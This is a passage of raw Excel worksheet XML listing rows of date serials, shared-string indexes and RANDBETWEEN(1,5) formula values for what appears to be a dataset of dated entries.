        <v>60</v>
      </c>
      <c r="E26171" t="s">
        <v>23778</v>
      </c>
      <c r="F26171">
        <f t="shared" ca="1" si="408"/>
        <v>2</v>
      </c>
    </row>
    <row r="26172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26172" s="1">
        <v>42929.318078703705</v>
      </c>
      <c r="C26172" t="s">
        <v>253</v>
      </c>
      <c r="E26172" t="s">
        <v>23779</v>
      </c>
      <c r="F26172">
        <f t="shared" ca="1" si="408"/>
        <v>3</v>
      </c>
    </row>
    <row r="26173" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26173" s="1">
        <v>42929.310752314814</v>
      </c>
      <c r="C26173" t="s">
        <v>48</v>
      </c>
      <c r="E26173" s="2" t="s">
        <v>23780</v>
      </c>
      <c r="F26173">
        <f t="shared" ca="1" si="408"/>
        <v>1</v>
      </c>
    </row>
    <row r="26174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26174" s="1">
        <v>42929.300173611111</v>
      </c>
      <c r="C26174" t="s">
        <v>41</v>
      </c>
      <c r="E26174" t="s">
        <v>23781</v>
      </c>
      <c r="F26174">
        <f t="shared" ca="1" si="408"/>
        <v>5</v>
      </c>
    </row>
    <row r="26175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26175" s="1">
        <v>42929.259814814817</v>
      </c>
      <c r="C26175" t="s">
        <v>97</v>
      </c>
      <c r="E26175" t="s">
        <v>23782</v>
      </c>
      <c r="F26175">
        <f t="shared" ca="1" si="408"/>
        <v>1</v>
      </c>
    </row>
    <row r="26176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26176" s="1">
        <v>42929.214212962965</v>
      </c>
      <c r="C26176" t="s">
        <v>103</v>
      </c>
      <c r="E26176" t="s">
        <v>23783</v>
      </c>
      <c r="F26176">
        <f t="shared" ca="1" si="408"/>
        <v>4</v>
      </c>
    </row>
    <row r="26177" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26177" s="1">
        <v>42929.20416666667</v>
      </c>
      <c r="C26177" t="s">
        <v>69</v>
      </c>
      <c r="E26177" s="2" t="s">
        <v>23784</v>
      </c>
      <c r="F26177">
        <f t="shared" ca="1" si="408"/>
        <v>5</v>
      </c>
    </row>
    <row r="26178" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26178" s="1">
        <v>42929.193703703706</v>
      </c>
      <c r="C26178" t="s">
        <v>71</v>
      </c>
      <c r="E26178" s="2" t="s">
        <v>23785</v>
      </c>
      <c r="F26178">
        <f t="shared" ref="F26178:F26241" ca="1" si="409">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="26179" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26179" s="1">
        <v>42929.182592592595</v>
      </c>
      <c r="C26179" t="s">
        <v>67</v>
      </c>
      <c r="E26179" s="2" t="s">
        <v>23786</v>
      </c>
      <c r="F26179">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26180" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26180" s="1">
        <v>42929.156099537038</v>
      </c>
      <c r="C26180" t="s">
        <v>41</v>
      </c>
      <c r="E26180" s="2" t="s">
        <v>23787</v>
      </c>
      <c r="F26180">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26181" s="1">
        <v>42929.125798611109</v>
      </c>
      <c r="C26181" t="s">
        <v>41</v>
      </c>
      <c r="E26181" t="s">
        <v>23788</v>
      </c>
      <c r="F26181">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26182" s="1">
        <v>42929.091689814813</v>
      </c>
      <c r="C26182" t="s">
        <v>41</v>
      </c>
      <c r="E26182" t="s">
        <v>23789</v>
      </c>
      <c r="F26182">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26183" s="1">
        <v>42929.046296296299</v>
      </c>
      <c r="C26183" t="s">
        <v>724</v>
      </c>
      <c r="E26183" t="s">
        <v>23790</v>
      </c>
      <c r="F26183">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26184" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26184" s="1">
        <v>42928.947384259256</v>
      </c>
      <c r="C26184" t="s">
        <v>41</v>
      </c>
      <c r="E26184" s="2" t="s">
        <v>23791</v>
      </c>
      <c r="F26184">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26185" s="1">
        <v>42928.893263888887</v>
      </c>
      <c r="C26185" t="s">
        <v>410</v>
      </c>
      <c r="E26185" t="s">
        <v>23792</v>
      </c>
      <c r="F26185">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26186" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26186" s="1">
        <v>42928.862337962964</v>
      </c>
      <c r="C26186" t="s">
        <v>107</v>
      </c>
      <c r="E26186" s="2" t="s">
        <v>23793</v>
      </c>
      <c r="F26186">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26187" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26187" s="1">
        <v>42928.784675925926</v>
      </c>
      <c r="C26187" t="s">
        <v>10</v>
      </c>
      <c r="D26187" t="s">
        <v>6</v>
      </c>
      <c r="E26187" s="2" t="s">
        <v>23794</v>
      </c>
      <c r="F26187">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26188" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26188" s="1">
        <v>42928.681909722225</v>
      </c>
      <c r="C26188" t="s">
        <v>10</v>
      </c>
      <c r="D26188" t="s">
        <v>89</v>
      </c>
      <c r="E26188" s="2" t="s">
        <v>23795</v>
      </c>
      <c r="F26188">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26189" s="1">
        <v>42928.671793981484</v>
      </c>
      <c r="C26189" t="s">
        <v>10</v>
      </c>
      <c r="D26189" t="s">
        <v>52</v>
      </c>
      <c r="E26189" t="s">
        <v>23796</v>
      </c>
      <c r="F26189">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26190" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26190" s="1">
        <v>42928.642314814817</v>
      </c>
      <c r="C26190" t="s">
        <v>10</v>
      </c>
      <c r="D26190" t="s">
        <v>89</v>
      </c>
      <c r="E26190" s="2" t="s">
        <v>23795</v>
      </c>
      <c r="F26190">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26191" s="1">
        <v>42928.640567129631</v>
      </c>
      <c r="C26191" t="s">
        <v>10</v>
      </c>
      <c r="D26191" t="s">
        <v>17</v>
      </c>
      <c r="E26191" t="s">
        <v>23797</v>
      </c>
      <c r="F26191">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26192" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A26192" s="1">
        <v>42928.623333333337</v>
      </c>
      <c r="C26192" t="s">
        <v>10</v>
      </c>
      <c r="D26192" t="s">
        <v>20</v>
      </c>
      <c r="E26192" s="2" t="s">
        <v>23798</v>
      </c>
      <c r="F26192">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26193" s="1">
        <v>42928.593807870369</v>
      </c>
      <c r="C26193" t="s">
        <v>10</v>
      </c>
      <c r="D26193" t="s">
        <v>374</v>
      </c>
      <c r="E26193" t="s">
        <v>23799</v>
      </c>
      <c r="F26193">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26194" s="1">
        <v>42928.578090277777</v>
      </c>
      <c r="C26194" t="s">
        <v>10</v>
      </c>
      <c r="D26194" t="s">
        <v>263</v>
      </c>
      <c r="E26194" t="s">
        <v>23800</v>
      </c>
      <c r="F26194">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26195" s="1">
        <v>42928.569398148145</v>
      </c>
      <c r="C26195" t="s">
        <v>260</v>
      </c>
      <c r="E26195" t="s">
        <v>23801</v>
      </c>
      <c r="F26195">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26196" s="1">
        <v>42928.555844907409</v>
      </c>
      <c r="C26196" t="s">
        <v>6</v>
      </c>
      <c r="D26196" t="s">
        <v>25</v>
      </c>
      <c r="E26196" t="s">
        <v>23802</v>
      </c>
      <c r="F26196">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26197" s="1">
        <v>42928.552349537036</v>
      </c>
      <c r="C26197" t="s">
        <v>10</v>
      </c>
      <c r="D26197" t="s">
        <v>89</v>
      </c>
      <c r="E26197" t="s">
        <v>23803</v>
      </c>
      <c r="F26197">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26198" s="1">
        <v>42928.548888888887</v>
      </c>
      <c r="C26198" t="s">
        <v>10</v>
      </c>
      <c r="D26198" t="s">
        <v>89</v>
      </c>
      <c r="E26198" t="s">
        <v>23803</v>
      </c>
      <c r="F26198">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26199" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26199" s="1">
        <v>42928.530659722222</v>
      </c>
      <c r="C26199" t="s">
        <v>6</v>
      </c>
      <c r="D26199" t="s">
        <v>25</v>
      </c>
      <c r="E26199" s="2" t="s">
        <v>23804</v>
      </c>
      <c r="F26199">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26200" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A26200" s="1">
        <v>42928.517199074071</v>
      </c>
      <c r="C26200" t="s">
        <v>71</v>
      </c>
      <c r="E26200" s="2" t="s">
        <v>23805</v>
      </c>
      <c r="F26200">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26201" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26201" s="1">
        <v>42928.516296296293</v>
      </c>
      <c r="C26201" t="s">
        <v>10</v>
      </c>
      <c r="D26201" t="s">
        <v>89</v>
      </c>
      <c r="E26201" s="2" t="s">
        <v>23806</v>
      </c>
      <c r="F26201">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26202" s="1">
        <v>42928.510810185187</v>
      </c>
      <c r="C26202" t="s">
        <v>10</v>
      </c>
      <c r="D26202" t="s">
        <v>632</v>
      </c>
      <c r="E26202" t="s">
        <v>23807</v>
      </c>
      <c r="F26202">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26203" s="1">
        <v>42928.504884259259</v>
      </c>
      <c r="C26203" t="s">
        <v>10</v>
      </c>
      <c r="D26203" t="s">
        <v>56</v>
      </c>
      <c r="E26203" t="s">
        <v>23808</v>
      </c>
      <c r="F26203">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26204" s="1">
        <v>42928.499756944446</v>
      </c>
      <c r="C26204" t="s">
        <v>10</v>
      </c>
      <c r="D26204" t="s">
        <v>36</v>
      </c>
      <c r="E26204" t="s">
        <v>23809</v>
      </c>
      <c r="F26204">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26205" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26205" s="1">
        <v>42928.489305555559</v>
      </c>
      <c r="C26205" t="s">
        <v>10</v>
      </c>
      <c r="D26205" t="s">
        <v>41</v>
      </c>
      <c r="E26205" s="2" t="s">
        <v>23810</v>
      </c>
      <c r="F26205">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26206" s="1">
        <v>42928.489155092589</v>
      </c>
      <c r="C26206" t="s">
        <v>10</v>
      </c>
      <c r="D26206" t="s">
        <v>14</v>
      </c>
      <c r="E26206" t="s">
        <v>23811</v>
      </c>
      <c r="F26206">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26207" s="1">
        <v>42928.487719907411</v>
      </c>
      <c r="C26207" t="s">
        <v>10</v>
      </c>
      <c r="D26207" t="s">
        <v>112</v>
      </c>
      <c r="E26207" t="s">
        <v>23812</v>
      </c>
      <c r="F26207">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26208" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A26208" s="1">
        <v>42928.473321759258</v>
      </c>
      <c r="C26208" t="s">
        <v>10</v>
      </c>
      <c r="D26208" t="s">
        <v>89</v>
      </c>
      <c r="E26208" s="2" t="s">
        <v>23813</v>
      </c>
      <c r="F26208">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26209" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A26209" s="1">
        <v>42928.461099537039</v>
      </c>
      <c r="C26209" t="s">
        <v>10</v>
      </c>
      <c r="D26209" t="s">
        <v>33</v>
      </c>
      <c r="E26209" s="2" t="s">
        <v>23694</v>
      </c>
      <c r="F26209">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26210" s="1">
        <v>42928.452210648145</v>
      </c>
      <c r="C26210" t="s">
        <v>6</v>
      </c>
      <c r="D26210" t="s">
        <v>25</v>
      </c>
      <c r="E26210" t="s">
        <v>23814</v>
      </c>
      <c r="F26210">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26211" s="1">
        <v>42928.447534722225</v>
      </c>
      <c r="C26211" t="s">
        <v>10</v>
      </c>
      <c r="D26211" t="s">
        <v>41</v>
      </c>
      <c r="E26211" t="s">
        <v>23815</v>
      </c>
      <c r="F26211">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26212" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26212" s="1">
        <v>42928.425844907404</v>
      </c>
      <c r="C26212" t="s">
        <v>60</v>
      </c>
      <c r="E26212" s="2" t="s">
        <v>23816</v>
      </c>
      <c r="F26212">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26213" s="1">
        <v>42928.42527777778</v>
      </c>
      <c r="C26213" t="s">
        <v>48</v>
      </c>
      <c r="E26213" t="s">
        <v>23817</v>
      </c>
      <c r="F26213">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26214" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26214" s="1">
        <v>42928.425011574072</v>
      </c>
      <c r="C26214" t="s">
        <v>10</v>
      </c>
      <c r="D26214" t="s">
        <v>163</v>
      </c>
      <c r="E26214" s="2" t="s">
        <v>23818</v>
      </c>
      <c r="F26214">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26215" s="1">
        <v>42928.411898148152</v>
      </c>
      <c r="C26215" t="s">
        <v>6</v>
      </c>
      <c r="D26215" t="s">
        <v>114</v>
      </c>
      <c r="E26215" t="s">
        <v>23819</v>
      </c>
      <c r="F26215">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26216" s="1">
        <v>42928.40724537037</v>
      </c>
      <c r="C26216" t="s">
        <v>10</v>
      </c>
      <c r="D26216" t="s">
        <v>192</v>
      </c>
      <c r="E26216" t="s">
        <v>23820</v>
      </c>
      <c r="F26216">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26217" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26217" s="1">
        <v>42928.380532407406</v>
      </c>
      <c r="C26217" t="s">
        <v>71</v>
      </c>
      <c r="E26217" s="2" t="s">
        <v>23821</v>
      </c>
      <c r="F26217">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26218" s="1">
        <v>42928.379849537036</v>
      </c>
      <c r="C26218" t="s">
        <v>10</v>
      </c>
      <c r="D26218" t="s">
        <v>36</v>
      </c>
      <c r="E26218" t="s">
        <v>23822</v>
      </c>
      <c r="F26218">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26219" s="1">
        <v>42928.374560185184</v>
      </c>
      <c r="C26219" t="s">
        <v>2104</v>
      </c>
      <c r="E26219" t="s">
        <v>23823</v>
      </c>
      <c r="F26219">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26220" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A26220" s="1">
        <v>42928.36041666667</v>
      </c>
      <c r="C26220" t="s">
        <v>71</v>
      </c>
      <c r="E26220" s="2" t="s">
        <v>23824</v>
      </c>
      <c r="F26220">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26221" s="1">
        <v>42928.34820601852</v>
      </c>
      <c r="C26221" t="s">
        <v>10</v>
      </c>
      <c r="D26221" t="s">
        <v>163</v>
      </c>
      <c r="E26221" t="s">
        <v>23825</v>
      </c>
      <c r="F26221">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26222" s="1">
        <v>42928.220671296294</v>
      </c>
      <c r="C26222" t="s">
        <v>48</v>
      </c>
      <c r="E26222" t="s">
        <v>23826</v>
      </c>
      <c r="F26222">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26223" s="1">
        <v>42928.218935185185</v>
      </c>
      <c r="C26223" t="s">
        <v>60</v>
      </c>
      <c r="F26223">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26224" s="1">
        <v>42928.177569444444</v>
      </c>
      <c r="C26224" t="s">
        <v>339</v>
      </c>
      <c r="E26224" t="s">
        <v>23827</v>
      </c>
      <c r="F26224">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26225" s="1">
        <v>42928.153240740743</v>
      </c>
      <c r="C26225" t="s">
        <v>73</v>
      </c>
      <c r="E26225" t="s">
        <v>23828</v>
      </c>
      <c r="F26225">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26226" s="1">
        <v>42928.105127314811</v>
      </c>
      <c r="C26226" t="s">
        <v>41</v>
      </c>
      <c r="E26226" t="s">
        <v>9512</v>
      </c>
      <c r="F26226">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26227" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26227" s="1">
        <v>42928.089178240742</v>
      </c>
      <c r="C26227" t="s">
        <v>140</v>
      </c>
      <c r="D26227" t="s">
        <v>46</v>
      </c>
      <c r="E26227" s="2" t="s">
        <v>23829</v>
      </c>
      <c r="F26227">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26228" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26228" s="1">
        <v>42928.085196759261</v>
      </c>
      <c r="C26228" t="s">
        <v>10</v>
      </c>
      <c r="D26228" t="s">
        <v>6</v>
      </c>
      <c r="E26228" s="2" t="s">
        <v>23830</v>
      </c>
      <c r="F26228">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26229" s="1">
        <v>42928.037534722222</v>
      </c>
      <c r="C26229" t="s">
        <v>140</v>
      </c>
      <c r="D26229" t="s">
        <v>234</v>
      </c>
      <c r="E26229" t="s">
        <v>23831</v>
      </c>
      <c r="F26229">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26230" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26230" s="1">
        <v>42927.965891203705</v>
      </c>
      <c r="C26230" t="s">
        <v>140</v>
      </c>
      <c r="D26230" t="s">
        <v>141</v>
      </c>
      <c r="E26230" s="2" t="s">
        <v>23557</v>
      </c>
      <c r="F26230">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26231" s="1">
        <v>42927.953946759262</v>
      </c>
      <c r="C26231" t="s">
        <v>253</v>
      </c>
      <c r="E26231" t="s">
        <v>23832</v>
      </c>
      <c r="F26231">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26232" s="1">
        <v>42927.854502314818</v>
      </c>
      <c r="C26232" t="s">
        <v>430</v>
      </c>
      <c r="E26232" t="s">
        <v>23833</v>
      </c>
      <c r="F26232">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26233" s="1">
        <v>42927.79478009259</v>
      </c>
      <c r="C26233" t="s">
        <v>10</v>
      </c>
      <c r="D26233" t="s">
        <v>46</v>
      </c>
      <c r="E26233" t="s">
        <v>23834</v>
      </c>
      <c r="F26233">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26234" s="1">
        <v>42927.711238425924</v>
      </c>
      <c r="C26234" t="s">
        <v>10</v>
      </c>
      <c r="D26234" t="s">
        <v>1036</v>
      </c>
      <c r="E26234" t="s">
        <v>23835</v>
      </c>
      <c r="F26234">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26235" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26235" s="1">
        <v>42927.69903935185</v>
      </c>
      <c r="C26235" t="s">
        <v>10</v>
      </c>
      <c r="D26235" t="s">
        <v>36</v>
      </c>
      <c r="E26235" s="2" t="s">
        <v>23836</v>
      </c>
      <c r="F26235">
        <f t="shared" ca="1" si="409"/>
        <v>2</v>
      </c>
    </row>
    <row r="26236" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26236" s="1">
        <v>42927.688599537039</v>
      </c>
      <c r="C26236" t="s">
        <v>10</v>
      </c>
      <c r="D26236" t="s">
        <v>33</v>
      </c>
      <c r="E26236" s="2" t="s">
        <v>23837</v>
      </c>
      <c r="F26236">
        <f t="shared" ca="1" si="409"/>
        <v>3</v>
      </c>
    </row>
    <row r="26237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26237" s="1">
        <v>42927.688275462962</v>
      </c>
      <c r="C26237" t="s">
        <v>10</v>
      </c>
      <c r="D26237" t="s">
        <v>46</v>
      </c>
      <c r="E26237" t="s">
        <v>23838</v>
      </c>
      <c r="F26237">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26238" s="1">
        <v>42927.677442129629</v>
      </c>
      <c r="C26238" t="s">
        <v>10</v>
      </c>
      <c r="D26238" t="s">
        <v>80</v>
      </c>
      <c r="E26238" t="s">
        <v>23839</v>
      </c>
      <c r="F26238">
        <f t="shared" ca="1" si="409"/>
        <v>4</v>
      </c>
    </row>
    <row r="26239" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26239" s="1">
        <v>42927.664861111109</v>
      </c>
      <c r="C26239" t="s">
        <v>10</v>
      </c>
      <c r="D26239" t="s">
        <v>52</v>
      </c>
      <c r="E26239" s="2" t="s">
        <v>23840</v>
      </c>
      <c r="F26239">
        <f t="shared" ca="1" si="409"/>
        <v>1</v>
      </c>
    </row>
    <row r="26240" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26240" s="1">
        <v>42927.656331018516</v>
      </c>
      <c r="C26240" t="s">
        <v>10</v>
      </c>
      <c r="D26240" t="s">
        <v>89</v>
      </c>
      <c r="E26240" s="2" t="s">
        <v>23841</v>
      </c>
      <c r="F26240">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26241" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26241" s="1">
        <v>42927.619976851849</v>
      </c>
      <c r="C26241" t="s">
        <v>10</v>
      </c>
      <c r="D26241" t="s">
        <v>163</v>
      </c>
      <c r="E26241" s="2" t="s">
        <v>23842</v>
      </c>
      <c r="F26241">
        <f t="shared" ca="1" si="409"/>
        <v>5</v>
      </c>
    </row>
    <row r="26242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26242" s="1">
        <v>42927.566805555558</v>
      </c>
      <c r="C26242" t="s">
        <v>10</v>
      </c>
      <c r="D26242" t="s">
        <v>52</v>
      </c>
      <c r="E26242" t="s">
        <v>23843</v>
      </c>
      <c r="F26242">
        <f t="shared" ref="F26242:F26305" ca="1" si="410">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="26243" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26243" s="1">
        <v>42927.560196759259</v>
      </c>
      <c r="C26243" t="s">
        <v>197</v>
      </c>
      <c r="E26243" s="2" t="s">
        <v>23844</v>
      </c>
      <c r="F26243">
        <f t="shared" ca="1" si="410"/>
        <v>2</v>
      </c>
    </row>
    <row r="26244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26244" s="1">
        <v>42927.550532407404</v>
      </c>
      <c r="C26244" t="s">
        <v>6</v>
      </c>
      <c r="D26244" t="s">
        <v>25</v>
      </c>
      <c r="E26244" t="s">
        <v>18927</v>
      </c>
      <c r="F26244">
        <f t="shared" ca="1" si="410"/>
        <v>3</v>
      </c>
    </row>
    <row r="26245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26245" s="1">
        <v>42927.543553240743</v>
      </c>
      <c r="C26245" t="s">
        <v>10</v>
      </c>
      <c r="D26245" t="s">
        <v>1036</v>
      </c>
      <c r="E26245" t="s">
        <v>23845</v>
      </c>
      <c r="F26245">
        <f t="shared" ca="1" si="410"/>
        <v>5</v>
      </c>
    </row>
    <row r="26246" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26246" s="1">
        <v>42927.543043981481</v>
      </c>
      <c r="C26246" t="s">
        <v>6</v>
      </c>
      <c r="D26246" t="s">
        <v>114</v>
      </c>
      <c r="E26246" s="2" t="s">
        <v>23846</v>
      </c>
      <c r="F26246">
        <f t="shared" ca="1" si="410"/>
        <v>4</v>
      </c>
    </row>
    <row r="26247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26247" s="1">
        <v>42927.527430555558</v>
      </c>
      <c r="C26247" t="s">
        <v>10</v>
      </c>
      <c r="D26247" t="s">
        <v>244</v>
      </c>
      <c r="E26247" t="s">
        <v>23847</v>
      </c>
      <c r="F26247">
        <f t="shared" ca="1" si="410"/>
        <v>5</v>
      </c>
    </row>
    <row r="26248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26248" s="1">
        <v>42927.523796296293</v>
      </c>
      <c r="C26248" t="s">
        <v>10</v>
      </c>
      <c r="D26248" t="s">
        <v>36</v>
      </c>
      <c r="E26248" t="s">
        <v>23848</v>
      </c>
      <c r="F26248">
        <f t="shared" ca="1" si="410"/>
        <v>3</v>
      </c>
    </row>
    <row r="26249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26249" s="1">
        <v>42927.511342592596</v>
      </c>
      <c r="C26249" t="s">
        <v>41</v>
      </c>
      <c r="E26249" t="s">
